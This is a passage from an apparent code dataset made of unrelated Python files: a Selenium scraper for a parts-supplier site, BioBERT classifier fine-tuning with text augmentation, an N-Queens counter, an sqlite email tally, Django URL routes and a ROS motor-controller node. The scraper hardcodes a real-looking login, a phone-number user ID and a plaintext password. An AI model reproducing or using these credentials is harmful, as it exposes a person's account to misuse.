\"Chrome\":\n options = webdriver.ChromeOptions()\n # options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"]) #去掉不受支持的命令行标记\n options.add_argument('--user-data-dir=C:/Users/CC-SERVER/AppData/Local/Google/Chrome/User Data/Default') # 设置成用户自己的数据目录\n driver = webdriver.Chrome(chrome_options=options)\n else:\n if browser == \"Firefox\":\n driver = webdriver.Firefox()\n else:\n driver = webdriver.PhantomJS()\n\n url = \"http://www.vipmro.net/login\"\n driver.get(url)\n s(3, 5)\n uid='18861779873'\n pwd='zhang1986'\n login_url(uid,pwd)\n #完成登录\n #点击一下搜索按钮,使页面正确加载url\n #driver.find_element_by_css_selector(\".index-button.cursor.ft14.J_searchListTop\").click()\n driver.get(\"http://www.vipmro.net/search?keyword=%25E6%2596%25BD%25E8%2580%2590%25E5%25BE%25B7\")\n s(3, 5)\n driver.find_element_by_css_selector(\".index-button.cursor.ft14.J_searchListTop\").click()\n s(3, 5)\n\n data = get_url_status()\n for i in range (len(data)):\n table_id=data[i][0]\n url=data[i][1]\n company_name=data[i][2]\n #url=str(url_t).replace(\"(('\",\"\").replace(\"',),)\",\"\")\n print(company_name,url)\n #url=u'http://www.vipmro.net/search?keyword=%25E5%25BE%25B7%25E5%258A%259B%25E8%25A5%25BF&categoryId=50101811'\n driver.get(url)\n s(4, 6)\n\n #先判断一共多少页\n page_num=driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"##################当前类目共%s页数据\"%page_num)\n if page_num=='15':\n #拆到系列这一级\n print(\"进行第一级系列的细化\")\n series_names, series_urls=find_series(1)\n for 
x in range(len(series_names)):\n print(\"分支\",series_names[x],series_urls[x])\n driver.get(series_urls[x])\n s(3,5)\n\n page_num2 = driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"当前类目共%s页数据\" % page_num2)\n if page_num2 == '15':\n # 拆到系列这一级\n print(\"进行第二级的细化\")\n series_names2, series_urls2 = find_series(2)\n for y in range(len(series_names2)):\n print(\"分支\", series_names2[y], series_urls2[y])\n driver.get(series_urls2[y])\n s(5, 8)\n\n page_num3 = driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"当前类目共%s页数据\" % page_num3)\n if page_num3 == '15':\n print(\"进行第三级的细化\")\n series_names3, series_urls3 = find_series(3)\n for z in range (len(series_names3)):\n print(\"分支\", series_names3[z], series_urls3[z])\n driver.get(series_urls3[z])\n s(3, 5)\n get_main_data(company_name, table_id)\n else:\n get_main_data(company_name, table_id)\n else:\n get_main_data(company_name, table_id)\n\n else:\n get_main_data(company_name, table_id)\n #update_status_to_run_log(table_id)\n\n\n\n","sub_path":"工品汇/正泰.NET/工品汇2.1-main.py","file_name":"工品汇2.1-main.py","file_ext":"py","file_size_in_byte":10617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"170066610","text":"import tensorflow as tf\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nfrom transformers import BertForSequenceClassification\nimport torch\nfrom transformers import AutoModel,AutoTokenizer\nimport numpy as np\nimport json,os,re\nfrom collections import Counter\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.model_selection import StratifiedKFold\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom transformers import AdamW\nfrom transformers import get_linear_schedule_with_warmup\nimport time,datetime\nfrom sklearn.metrics import classification_report\nimport random\nimport nltk\nnltk.download('wordnet')\nfrom nltk.corpus import wordnet \nfrom random import shuffle\n\n\n# If there's a GPU available...\nif torch.cuda.is_available(): \n\n # Tell PyTorch to use the GPU. \n device = torch.device(\"cuda\")\n\n print('There are %d GPU(s) available.' % torch.cuda.device_count())\n\n print('We will use the GPU:', torch.cuda.get_device_name(0))\n\n# If not...\nelse:\n print('No GPU available, using the CPU instead.')\n device = torch.device(\"cpu\")\n \ndef preprocess_data(tokenizer, sentences, MAX_LEN = 256):\n \"\"\"\n :params[in]: tokenizer, the configured tokenizer\n :params[in]: sentences, list of strings\n \"\"\"\n # 1. Tokenize all of the sentences and map the tokens to thier word IDs.\n input_ids = []\n \n # For every sentence...\n for sent in sentences:\n # `encode` will:\n # (1) Tokenize the sentence.\n # (2) Prepend the `[CLS]` token to the start.\n # (3) Append the `[SEP]` token to the end.\n # (4) Map tokens to their IDs.\n encoded_sent = tokenizer.encode(\n sent, # Sentence to encode.\n add_special_tokens = True, # Add '[CLS]' and '[SEP]'\n # This function also supports truncation and conversion\n # to pytorch tensors, but we need to do padding, so we\n # can't use these features :( .\n #max_length = 128, # Truncate all sentences.\n #return_tensors = 'pt', # Return pytorch tensors.\n ) \n # Add the encoded sentence to the list.\n input_ids.append(encoded_sent)\n \n # Set the maximum sequence length.\n # maximum training sentence length of 87...\n \n print('\\nPadding/truncating all sentences to %d values...' 
% MAX_LEN)\n \n print('\\nPadding token: \"{:}\", ID: {:}'.format(tokenizer.pad_token, tokenizer.pad_token_id))\n \n # Pad our input tokens with value 0.\n # \"post\" indicates that we want to pad and truncate at the end of the sequence,\n # as opposed to the beginning.\n input_ids = pad_sequences(input_ids, maxlen=MAX_LEN, dtype=\"long\", \n value=0, truncating=\"post\", padding=\"post\")\n # Create attention masks\n attention_masks = []\n # For each sentence...\n for sent in input_ids:\n \n # Create the attention mask.\n # - If a token ID is 0, then it's padding, set the mask to 0.\n # - If a token ID is > 0, then it's a real token, set the mask to 1.\n att_mask = [int(token_id > 0) for token_id in sent]\n \n # Store the attention mask for this sentence.\n attention_masks.append(att_mask)\n return input_ids, attention_masks\n\n# Function to calculate the accuracy of our predictions vs labels\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\ndef format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n \n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\ndef train_eval(clf_model, train_dataloader, validation_dataloader, base_dir,\n weights=None, lr=2e-5, epochs=4, eval_every_num_iters=40, seed_val = 42):\n \"\"\"train and evaluate a deep learning model\n :params[in]: clf_model, a classifier\n :params[in]: train_dataloader, training data\n :params[in]: validation_dataloader, validation data\n :params[in]: base_dir, output directory to create the directory to save results\n :params[in]: lr, the learning rate\n :params[in]: epochs, the number of training epochs\n :params[in]: eval_every_num_iters, the number of iterations to evaluate\n :params[in]: seed_val, set a random seed\n \"\"\"\n # the 'W' stands for 'Warm up\", AdamW is a class from the huggingface library\n optimizer = AdamW(clf_model.parameters(),\n lr = lr, # args.learning_rate - default is 5e-5, our notebook had 2e-5\n eps = 1e-8 # args.adam_epsilon - default is 1e-8.\n )\n # Number of training epochs (authors recommend between 2 and 4)\n epochs = epochs\n # Total number of training steps is number of batches * number of epochs.\n total_steps = len(train_dataloader) * epochs\n # Create the learning rate scheduler.\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 1, # Default value in run_glue.py\n num_training_steps = total_steps)\n # see if weights is None:\n if weights != None:\n weights = torch.FloatTensor(weights)\n # Set the seed value all over the place to make this reproducible.\n random.seed(seed_val)\n np.random.seed(seed_val)\n torch.manual_seed(seed_val)\n torch.cuda.manual_seed_all(seed_val)\n \n # Store the average loss after each epoch so we can plot them.\n loss_values = []\n \n # For each epoch...\n for epoch_i in range(0, epochs):\n \n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n \n # Measure how long the training epoch takes.\n t0 = time.time()\n \n # Reset the total loss for this epoch.\n total_loss = 0\n \n # Put the model into training mode. 
Don't be mislead--the call to \n # `train` just changes the *mode*, it doesn't *perform* the training.\n # `dropout` and `batchnorm` layers behave differently during training\n # vs. test (source: https://stackoverflow.com/questions/51433378/what-does-model-train-do-in-pytorch)\n clf_model.train() ## model training mode\n \n # For each batch of training data...\n for step, batch in enumerate(train_dataloader):\n \n # Unpack this training batch from our dataloader. \n #\n # As we unpack the batch, we'll also copy each tensor to the GPU using the \n # `to` method.\n #\n # `batch` contains three pytorch tensors:\n # [0]: input ids \n # [1]: attention masks\n # [2]: labels \n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n # Always clear any previously calculated gradients before performing a\n # backward pass. PyTorch doesn't do this automatically because \n # accumulating the gradients is \"convenient while training RNNs\". \n # (source: https://stackoverflow.com/questions/48001598/why-do-we-need-to-call-zero-grad-in-pytorch)\n clf_model.zero_grad() \n \n # Perform a forward pass (evaluate the model on this training batch).\n # This will return the loss (rather than the model output) because we\n # have provided the `labels`.\n # The documentation for this `model` function is here: \n # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification\n outputs = clf_model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask, \n labels=b_labels,\n weights=weights)\n #weights=torch.FloatTensor([100/127,100/191,100/34]))\n \n # The call to `model` always returns a tuple, so we need to pull the \n # loss value out of the tuple.\n loss = outputs[0]\n \n # Accumulate the training loss over all of the batches so that we can\n # calculate the average loss at the end. `loss` is a Tensor containing a\n # single value; the `.item()` function just returns the Python value \n # from the tensor.\n total_loss += loss.item()\n \n # Perform a backward pass to calculate the gradients.\n loss.backward()\n \n # Clip the norm of the gradients to 1.0.\n # This is to help prevent the \"exploding gradients\" problem.\n torch.nn.utils.clip_grad_norm_(clf_model.parameters(), 1.0)\n \n # Update parameters and take a step using the computed gradient.\n # The optimizer dictates the \"update rule\"--how the parameters are\n # modified based on their gradients, the learning rate, etc.\n optimizer.step() \n # Update the learning rate.\n scheduler.step()\n # eveluate the performance after some iterations\n if step % eval_every_num_iters == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = format_time(time.time() - t0)\n # Report progress.\n print(' Batch {:>5,} of {:>5,}. 
Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\n tmp_dir = base_dir+'/epoch'+str(epoch_i+1)+'iteration'+str(step)\n ## save pretrained model\n evaluate_model(clf_model, validation_dataloader, tmp_dir)\n clf_model.train() ## model training mode\n # Calculate the average loss over the training data.\n avg_train_loss = total_loss / len(train_dataloader) \n \n # Store the loss value for plotting the learning curve.\n loss_values.append(avg_train_loss)\n # save the data after epochs\n tmp_dir = base_dir+'/epoch'+str(epoch_i+1)+'_done'\n ## save pretrained model\n evaluate_model(clf_model, validation_dataloader, tmp_dir)\n clf_model.train() ## model training mode\n\n### evaluate the performance of current model\ndef evaluate_model(clf_model, validation_dataloader, save_dir):\n \"\"\"\n :params[in]: clf_model, the pre-trained classifier\n :params[in]: validation_dataloader, the validation dataset\n :params[in]: save_dir, the directory name to save the fine-tuned model\n \n \"\"\"\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently\n # during evaluation.\n clf_model.eval()\n # Tracking variables \n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n true_labels,pred_labels=[],[]\n # Evaluate data for one epoch\n for batch in validation_dataloader:\n \n # Add batch to GPU\n batch = tuple(t.to(device) for t in batch)\n \n # Unpack the inputs from our dataloader\n b_input_ids, b_input_mask, b_labels = batch\n \n # Telling the model not to compute or store gradients, saving memory and\n # speeding up validation\n with torch.no_grad(): \n # Forward pass, calculate logit predictions.\n # This will return the logits rather than the loss because we have\n # not provided labels.\n # token_type_ids is the same as the \"segment ids\", which \n # differentiates sentence 1 and 2 in 2-sentence tasks.\n # The documentation for this `model` function is here: \n # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification\n outputs = clf_model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # Get the \"logits\" output by the model. 
The \"logits\" are the output\n # values prior to applying an activation function like the softmax.\n logits = outputs[0]\n\n # Move logits and labels to CPU\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n\n # Calculate the accuracy for this batch of test sentences.\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n ## pred_labels/true_labels in a batch flatten\n pred_flat = np.argmax(logits, axis=1).flatten()\n true_flat = label_ids.flatten()\n\n # true labels and predicted labels\n true_labels += true_flat.tolist()\n pred_labels += pred_flat.tolist()\n # Accumulate the total accuracy.\n eval_accuracy += tmp_eval_accuracy\n # Track the number of batches\n nb_eval_steps += 1\n\n # Report the final accuracy for this validation run\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n clf_model.save_pretrained(save_dir) ## save model\n print(classification_report(true_labels, pred_labels,digits=3),\n file=open(save_dir+'/result.txt','a'))\n print(\" Accuracy: {0:.3f}\".format(eval_accuracy/nb_eval_steps),\n file=open(save_dir+'/result.txt','a'))\n\n# Easy data augmentation techniques for text classification\n#stop words list\n\nstop_words = ['i', 'me', 'my', 'myself', 'we', 'our', \n\t\t\t'ours', 'ourselves', 'you', 'your', 'yours', \n\t\t\t'yourself', 'yourselves', 'he', 'him', 'his', \n\t\t\t'himself', 'she', 'her', 'hers', 'herself', \n\t\t\t'it', 'its', 'itself', 'they', 'them', 'their', \n\t\t\t'theirs', 'themselves', 'what', 'which', 'who', \n\t\t\t'whom', 'this', 'that', 'these', 'those', 'am', \n\t\t\t'is', 'are', 'was', 'were', 'be', 'been', 'being', \n\t\t\t'have', 'has', 'had', 'having', 'do', 'does', 'did',\n\t\t\t'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or',\n\t\t\t'because', 'as', 'until', 'while', 'of', 'at', \n\t\t\t'by', 'for', 'with', 'about', 'against', 'between',\n\t\t\t'into', 'through', 'during', 'before', 'after', \n\t\t\t'above', 'below', 'to', 'from', 'up', 'down', 'in',\n\t\t\t'out', 'on', 'off', 'over', 'under', 'again', \n\t\t\t'further', 'then', 'once', 'here', 'there', 'when', \n\t\t\t'where', 'why', 'how', 'all', 'any', 'both', 'each', \n\t\t\t'few', 'more', 'most', 'other', 'some', 'such', 'no', \n\t\t\t'nor', 'not', 'only', 'own', 'same', 'so', 'than', 'too', \n\t\t\t'very', 's', 't', 'can', 'will', 'just', 'don', \n\t\t\t'should', 'now', '']\n\ndef get_only_chars(line):\n\n clean_line = \"\"\n\n line = line.replace(\"’\", \"\")\n line = line.replace(\"'\", \"\")\n line = line.replace(\"-\", \" \") #replace hyphens with spaces\n line = line.replace(\"\\t\", \" \")\n line = line.replace(\"\\n\", \" \")\n line = line.lower()\n\n for char in line:\n if char in 'qwertyuiopasdfghjklzxcvbnm ':\n clean_line += char\n else:\n clean_line += ' '\n\n clean_line = re.sub(' +',' ',clean_line) #delete extra spaces\n if clean_line[0] == ' ':\n clean_line = clean_line[1:]\n return clean_line\n\n########################################################################\n# Synonym replacement\n# Replace n words in the sentence with synonyms from wordnet\n########################################################################\n\n#for the first time you use wordnet\n\ndef synonym_replacement(words, n):\n\tnew_words = words.copy()\n\trandom_word_list = list(set([word for word in words if word not in stop_words]))\n\trandom.shuffle(random_word_list)\n\tnum_replaced = 0\n\tfor random_word in random_word_list:\n\t\tsynonyms = get_synonyms(random_word)\n\t\tif len(synonyms) >= 1:\n\t\t\tsynonym = 
random.choice(list(synonyms))\n\t\t\tnew_words = [synonym if word == random_word else word for word in new_words]\n\t\t\t#print(\"replaced\", random_word, \"with\", synonym)\n\t\t\tnum_replaced += 1\n\t\tif num_replaced >= n: #only replace up to n words\n\t\t\tbreak\n\t#this is stupid but we need it, trust me\n\tsentence = ' '.join(new_words)\n\tnew_words = sentence.split(' ')\n\n\treturn new_words\n\ndef get_synonyms(word):\n\tsynonyms = set()\n\tfor syn in wordnet.synsets(word): \n\t\tfor l in syn.lemmas(): \n\t\t\tsynonym = l.name().replace(\"_\", \" \").replace(\"-\", \" \").lower()\n\t\t\tsynonym = \"\".join([char for char in synonym if char in ' qwertyuiopasdfghjklzxcvbnm'])\n\t\t\tsynonyms.add(synonym) \n\tif word in synonyms:\n\t\tsynonyms.remove(word)\n\treturn list(synonyms)\n\n########################################################################\n# Random deletion\n# Randomly delete words from the sentence with probability p\n########################################################################\n\ndef random_deletion(words, p):\n\n\t#obviously, if there's only one word, don't delete it\n\tif len(words) == 1:\n\t\treturn words\n\n\t#randomly delete words with probability p\n\tnew_words = []\n\tfor word in words:\n\t\tr = random.uniform(0, 1)\n\t\tif r > p:\n\t\t\tnew_words.append(word)\n\n\t#if you end up deleting all words, just return a random word\n\tif len(new_words) == 0:\n\t\trand_int = random.randint(0, len(words)-1)\n\t\treturn [words[rand_int]]\n\n\treturn new_words\n\n########################################################################\n# Random swap\n# Randomly swap two words in the sentence n times\n########################################################################\n\ndef random_swap(words, n):\n\tnew_words = words.copy()\n\tfor _ in range(n):\n\t\tnew_words = swap_word(new_words)\n\treturn new_words\n\ndef swap_word(new_words):\n\trandom_idx_1 = random.randint(0, len(new_words)-1)\n\trandom_idx_2 = random_idx_1\n\tcounter = 0\n\twhile random_idx_2 == random_idx_1:\n\t\trandom_idx_2 = random.randint(0, len(new_words)-1)\n\t\tcounter += 1\n\t\tif counter > 3:\n\t\t\treturn new_words\n\tnew_words[random_idx_1], new_words[random_idx_2] = new_words[random_idx_2], new_words[random_idx_1] \n\treturn new_words\n\n########################################################################\n# Random insertion\n# Randomly insert n words into the sentence\n########################################################################\n\ndef random_insertion(words, n):\n\tnew_words = words.copy()\n\tfor _ in range(n):\n\t\tadd_word(new_words)\n\treturn new_words\n\ndef add_word(new_words):\n\tsynonyms = []\n\tcounter = 0\n\twhile len(synonyms) < 1:\n\t\trandom_word = new_words[random.randint(0, len(new_words)-1)]\n\t\tsynonyms = get_synonyms(random_word)\n\t\tcounter += 1\n\t\tif counter >= 10:\n\t\t\treturn\n\trandom_synonym = synonyms[0]\n\trandom_idx = random.randint(0, len(new_words)-1)\n\tnew_words.insert(random_idx, random_synonym)\n\n########################################################################\n# main data augmentation function\n########################################################################\n\ndef eda(sentence, alpha_sr=0.1, alpha_ri=0.1, alpha_rs=0.1, p_rd=0.1, num_aug=9):\n\t\n\tsentence = get_only_chars(sentence)\n\twords = sentence.split(' ')\n\twords = [word for word in words if word is not '']\n\tnum_words = len(words)\n\t\n\taugmented_sentences = []\n\tnum_new_per_technique = int(num_aug/4)+1\n\tn_sr = max(1, 
int(alpha_sr*num_words))\n\tn_ri = max(1, int(alpha_ri*num_words))\n\tn_rs = max(1, int(alpha_rs*num_words))\n\n\t#sr\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = synonym_replacement(words, n_sr)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#ri\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_insertion(words, n_ri)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#rs\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_swap(words, n_rs)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#rd\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_deletion(words, p_rd)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\taugmented_sentences = [get_only_chars(sentence) for sentence in augmented_sentences]\n\tshuffle(augmented_sentences)\n\n\t#trim so that we have the desired number of augmented sentences\n\tif num_aug >= 1:\n\t\taugmented_sentences = augmented_sentences[:num_aug]\n\telse:\n\t\tkeep_prob = num_aug / len(augmented_sentences)\n\t\taugmented_sentences = [s for s in augmented_sentences if random.uniform(0, 1) < keep_prob]\n\n\t#append the original sentence\n\taugmented_sentences.append(sentence)\n\n\treturn augmented_sentences\n\ndef augment_train(x_train, y_train, label_aug=2, num_aug=4):\n \"\"\" Use Data augmentation to augment training set\n :params[in]: x_train, training examples\n :params[in]: y_train, labels for training set\n :params[in]: label_aug, the label to do augmentation\n \n :params[in]: x_train,y_train, augmented training data\n \"\"\"\n x_train_urgent = [x for x,y in zip(x_train,y_train) if \\\n y==label_aug]\n ## augment sentences\n aug_sentences = []\n for sen0 in x_train_urgent:\n ## original sentence will be removed\n aug_sentences += eda(sen0, alpha_sr=0.05, alpha_ri=0.05, \\\n alpha_rs=0.05, p_rd=0.05, num_aug=num_aug)[:-1]\n ## append to the original data --only augment urgent sentences\n x_train += aug_sentences\n y_train += [label_aug]*len(aug_sentences)\n ## return augmented data\n return x_train, y_train\n\nif __name__=='__main__':\n tokenizer = AutoTokenizer.from_pretrained(\"biobert_v1.1_pubmed\", from_tf=True)\n ## set the padding\n tokenizer.pad_token = '[PAD]'\n # tokenizer.pad_token_id\n data0 = json.load(open('original_labelled_data.json', 'r'))\n sentences,labels = data0['sentences'],data0['labels']\n #lm_model = AutoModelWithLMHead.from_pretrained(\"biobert_v1.1_pubmed\", from_tf=True)\n ## split data into K-folds\n skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=2020)\n skf.get_n_splits(sentences, labels)\n ## loop over train/test data splits\n split_index = 0 \n for train_index, test_index in skf.split(sentences, labels):\n split_index +=1\n x_train, x_test = [sentences[i] for i in train_index], [sentences[i] for i in test_index]\n y_train, y_test = [labels[i] for i in train_index], [labels[i] for i in test_index]\n ## augment training data\n x_train, y_train=augment_train(x_train, y_train, label_aug=2, num_aug=4)\n ## use preprocess_date function\n train_inputs,train_masks = preprocess_data(tokenizer, x_train, MAX_LEN = 256)\n validation_inputs,validation_masks = preprocess_data(tokenizer, x_test, MAX_LEN = 256)\n train_inputs = torch.tensor(train_inputs)\n validation_inputs = torch.tensor(validation_inputs)\n train_labels = torch.tensor(y_train)\n validation_labels = torch.tensor(y_test)\n train_masks = torch.tensor(train_masks)\n validation_masks = torch.tensor(validation_masks)\n ## initialize model\n 
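    # num_labels is derived from the full label set so every CV fold trains an
    # identical classification head; from_tf=True converts the TensorFlow
    # BioBERT checkpoint to PyTorch weights at load time.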
clf_model=BertForSequenceClassification.from_pretrained(\"biobert_v1.1_pubmed\",\n                                  num_labels=len(set(labels)),\n                                  from_tf=True)\n        # For fine-tuning BERT on a specific task, the authors recommend a batch size of\n        # 16 or 32.\n        batch_size = 4\n        # Create the DataLoader for our training set.\n        train_data = TensorDataset(train_inputs, train_masks, train_labels)\n        train_sampler = RandomSampler(train_data)\n        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=batch_size)\n        # Create the DataLoader for our validation set.\n        validation_data = TensorDataset(validation_inputs, validation_masks, validation_labels)\n        validation_sampler = SequentialSampler(validation_data)\n        validation_dataloader = DataLoader(validation_data, sampler=validation_sampler,\n                                  batch_size=batch_size)\n        base_dir = 'fine_tuned_bio_bert/bio_bert_augmentation_split_'+str(split_index)\n        train_eval(clf_model, train_dataloader, validation_dataloader, base_dir, \\\n             lr=2e-5, epochs=4, eval_every_num_iters=80, seed_val = 42) #weights=[100/127,100/191,100/34])\n","sub_path":"cross_validation_code_da.py","file_name":"cross_validation_code_da.py","file_ext":"py","file_size_in_byte":24267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223585837","text":"# Instead of storing every full solution in an array,\n# this version only counts: search() returns the number of valid placements found\n\nclass Solution:\n    \"\"\"\n    Calculate the total number of distinct N-Queen solutions.\n    @param n: The number of queens.\n    @return: The total number of distinct solutions.\n    \"\"\"\n\n    def totalNQueens(self, n):\n        # the result is a count, so return 0 (not an empty list) for invalid input\n        if n < 1:\n            return 0\n        res = self.search(n, [])\n        return res\n\n    def isValid(self, cols, row):\n        m = len(cols)\n        for i in range(m):\n            if abs(row - cols[i]) == m - i:\n                return False\n            
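# two queens placed in the same column also conflict\n            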
if row == cols[i]:\n return False\n return True\n\n def search(self, n, cols):\n if len(cols) == n:\n return 1\n\n res = 0\n for i in range(n):\n if not self.isValid(cols, i):\n continue\n cols.append(i)\n tmp = self.search(n, cols)\n res += tmp\n cols.pop()\n return res\n","sub_path":"leetcode/052-N-Queens-II/NQueens_004.py","file_name":"NQueens_004.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179583620","text":"import sqlite3\r\nimport urllib.request, urllib.parse, urllib.error\r\n\r\nconn = sqlite3.connect('emailexercise.sqllite')\r\ncur = conn.cursor()\r\n\r\ncur.execute('DROP TABLE IF EXISTS Counts')\r\n\r\ncur.execute('CREATE TABLE Counts (Email TEXT, count INTEGER)')\r\n\r\nfh = open('C:\\\\Users\\Gaurav Shubham\\Desktop\\gaurav.txt', 'r')\r\nfor line in fh:\r\n if not line.startswith('From: '):\r\n continue\r\n pieces = line.split()\r\n email = pieces[1]\r\n cur.execute('SELECT count FROM Counts WHERE email = ? ', (email,))\r\n row = cur.fetchone()\r\n if row is None:\r\n cur.execute('INSERT INTO Counts (email,count) VALUES (?,1)', (email,))\r\n else:\r\n cur.execute('UPDATE Counts SET count = count + 1 WHERE email = ?', (email,))\r\n conn.commit()\r\n\r\nsqlstr = 'SELECT email,count FROM Counts ORDER BY count DESC LIMIT 1000'\r\n\r\nfor row in cur.execute(sqlstr):\r\n print(str(row[0]), row[1])\r\n print('Done and dusted')\r\n","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121681085","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom moon_tracker import views\n\nurlpatterns = [\n url(r'^system/(?P.+)/(?P[0-9]+)/(?P[0-9]+)/$', views.moon_detail, name='moon_detail'),\n url(r'^system/(?P.+)/$', views.list_system, name='list_system'),\n url(r'^constellation/(?P.+)/$', views.SolarSystemListView.as_view(), name='list_constellation'),\n url(r'^region/(?P.+)/$', views.ConstellationListView.as_view(), name='list_region'),\n url(r'^submit/$', views.batch_submit, name='batch_submit'),\n url(r'^$', views.RegionListView.as_view(), name='list_universe'),\n]\n","sub_path":"elmo/moon_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86416411","text":"#!/usr/bin/env python\nimport rospy\nfrom roboteq_interface.msg import motor_commands\nfrom roboteq_interface.msg import speed2_data\nimport serial\nimport struct\nimport time\n\ncallback_time = 0.0\n\ndef openPort():\n\tglobal port_open\n\tglobal ser\n\techof_plus = False\n\techof_timeout = 0.1\n\tser=serial.Serial(\"/dev/ttyACM1\",115200,serial.EIGHTBITS,serial.PARITY_NONE,serial.STOPBITS_ONE,0,False,False,None,False,None)\n\tser.flushInput()\n\tser.flushOutput()\n\t#rospy.loginfo(\"Opened Controller 2\")\n\twhile not echof_plus:\n\t\tser.write(\"^ECHOF 1\\r\")\n\t\tn = readChar(ser,1.0)\n\t\tinitial_time = time.clock()\n\t\tcurrent_time = time.clock()\n\t\twhile (not checkChar(n,b'\\x2B')) and ((current_time - initial_time) <= echof_timeout):\n\t\t\t#rospy.loginfo(\"Looping for ECHOF +\")\n\t\t\tn = readChar(ser,1.0)\n\t\t\tif checkChar(n,b'\\x2B'):\n\t\t\t\techof_plus = True\n\t\t\tcurrent_time = time.clock()\n\tn = readChar(ser,1.0)\n\twhile not checkChar(n,b'\\x0D'):\n\t\tn = readChar(ser,1.0)\n\t\t#rospy.loginfo(\"Looping for 
ECHOF CR\")\n\t#rospy.loginfo(\"Read ECHOF + and CR\")\n\tport_open = True\n\ndef callback(msg_in):\n\tglobal motor_1_speed\n\tglobal motor_2_speed\n\tglobal callback_time\n\tmotor_1_speed = msg_in.cont_2_motor_1_speed_cmd\n\tmotor_2_speed = msg_in.cont_2_motor_2_speed_cmd\n\tcallback_time = time.clock()\n\ndef mis_speed2_node():\n\tglobal ser\n\tglobal motor_1_speed\n\tglobal motor_2_speed\n\tglobal encoder_1_sign\n\tglobal encoder_2_sign\n\tglobal RPM_1_sign\n\tglobal RPM_2_sign\n\tglobal port_open\n\tglobal callback_time\n\tpub = rospy.Publisher('mis/speed2_data', speed2_data)\n\tsub = rospy.Subscriber('mis/motor_commands',motor_commands,callback)\n\trospy.init_node('mis_speed2_node')\n\tmsg_out = speed2_data()\n\tmotor_1_speed = 0\n\tmotor_2_speed = 0\n\tcallback_timeout = 1.0\n\tp = ''\n\tport_open = False\n\twhile not port_open:\n\t\ttry:\n\t\t\topenPort()\n\t\texcept serial.SerialException:\n\t\t\t#rospy.loginfo(\"Controller 2 not open\")\n\t\t\tpass\n\twhile not rospy.is_shutdown():\n\t\tcurrent_time = time.clock()\n\t\tif (current_time - callback_time) >= callback_timeout:\n\t\t\tmotor_1_speed = 0\n\t\t\tmotor_2_speed = 0\n\t\tout_buff1 = \"!G 1 \"+str(motor_1_speed)+\"\\r\"\n\t\tser.write(out_buff1)\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x2B':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first +\")\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x0D':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first CR\")\n\t\tout_buff2 = \"!G 2 \"+str(motor_2_speed)+\"\\r\"\n\t\tser.write(out_buff2)\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x2B':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for second +\")\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x0D':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first CR\")\n\t\tser.write(\"?C\\r\") # Request Absolute Encoder Counts\n\t\tm=readChar(ser,1.0)\n\t\t#rospy.loginfo(\"Looking for C, Actually Read %d\",ord(m))\n\t\tif checkChar(m,b'\\x43') == 